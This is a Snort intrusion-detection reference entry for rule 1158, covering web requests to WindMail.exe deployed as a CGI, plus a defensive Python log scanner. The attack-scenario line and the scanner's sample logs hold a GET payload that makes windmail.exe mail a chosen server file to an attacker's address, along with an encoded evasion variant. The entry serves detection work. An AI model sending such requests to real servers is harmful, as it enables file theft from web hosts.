File: 1158.txt

Rule:  

--

Sid:
1158

--

Summary:
This event is generated when an attempt is made to access the executable
file WindMail.exe using a web connection.

--
Impact:
Remote attackers could subvert the WindMail mailer to read or execute
arbitrary files on the web server.

--
Detailed Information:
WindMail is a command-line mail program for Windows.  It is sometimes
deployed for scripting or for sending email through a web application.
Some WindMail deployments make windmail.exe a CGI application, which it was
not designed to be.  The result is that an attacker could read or
execute arbitrary files on the system that the web server has access to.
windmail.exe should never be a CGI application itself; it should instead be
called by another program that properly filters its input.

--
Affected Systems:
	All systems using windmail.exe

--
Attack Scenarios:
http://target/cgi-bin/windmail.exe?%20-n%20desired.file%20attacker_email_address

--
Ease of Attack:
Simple crafting of a web GET request

--
False Positives:
None Known

--
False Negatives:
If a CGI script calls windmail.exe, but windmail.exe itself is not a CGI
application, then this rule will not generate an event. If the CGI
application does not properly filter input, there is a possibility
that the attack could still succeed.

--
Corrective Action:
Look at the packet to determine whether a request was made via an HTTP GET
for the windmail.exe application. If so, determine whether the attacked
web server had windmail.exe on it.
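As an added illustration of the check this document describes (not the Snort rule itself, whose text is not reproduced here), the following script normalises the request URI the way an HTTP inspector would (percent-decoding and lowercasing) before looking for windmail.exe, and runs over a few constructed access-log lines. The log lines, addresses and file names are made up for the example; note how the wrapper-script request in the last line is not flagged, which is the false negative described above.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (Common Log Format); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2008:13:55:36 +0000] "GET /cgi-bin/windmail.exe?%20-n%20desired.file%20attacker@example.org HTTP/1.0" 200 512
203.0.113.5 - - [10/Oct/2008:13:55:40 +0000] "GET /cgi-bin/WindMail.EXE?-n%20file HTTP/1.1" 200 120
198.51.100.7 - - [10/Oct/2008:13:56:01 +0000] "GET /cgi-bin/wind%6dail.exe HTTP/1.1" 404 210
198.51.100.7 - - [10/Oct/2008:13:56:10 +0000] "POST /cgi-bin/contact.pl HTTP/1.1" 200 330
"""

# Pull method and URI out of the quoted request line.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/\d\.\d"')


def normalize_path(uri: str) -> str:
    """Percent-decode the path component and lowercase it.

    Windows file names are case-insensitive, and %6d is just 'm', so a raw
    substring match on 'windmail.exe' would miss both variants below."""
    path = urlsplit(uri).path
    return unquote(path).lower()


def is_windmail_request(line: str):
    """Return (method, normalised path) when the request addresses windmail.exe
    directly, otherwise None.

    Only a direct request to the executable is visible here; a CGI wrapper
    that invokes windmail.exe on the server side produces no match."""
    m = REQ_RE.search(line)
    if not m:
        return None
    path = normalize_path(m.group("uri"))
    if path.rsplit("/", 1)[-1] == "windmail.exe":
        return m.group("method"), path
    return None


def scan(log_text: str):
    """Return the list of flagged (method, path) tuples for a block of log text."""
    hits = (is_windmail_request(line) for line in log_text.splitlines())
    return [hit for hit in hits if hit]


if __name__ == "__main__":
    for method, path in scan(SAMPLE_LOG):
        print(f"windmail.exe requested directly: {method} {path}")
```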

--
Contributors:
Original rule writer unknown
Original document author unknown
Sourcefire Vulnerability Research Team
Nigel Houghton <nigel.houghton@sourcefire.com>

--
Additional References:


--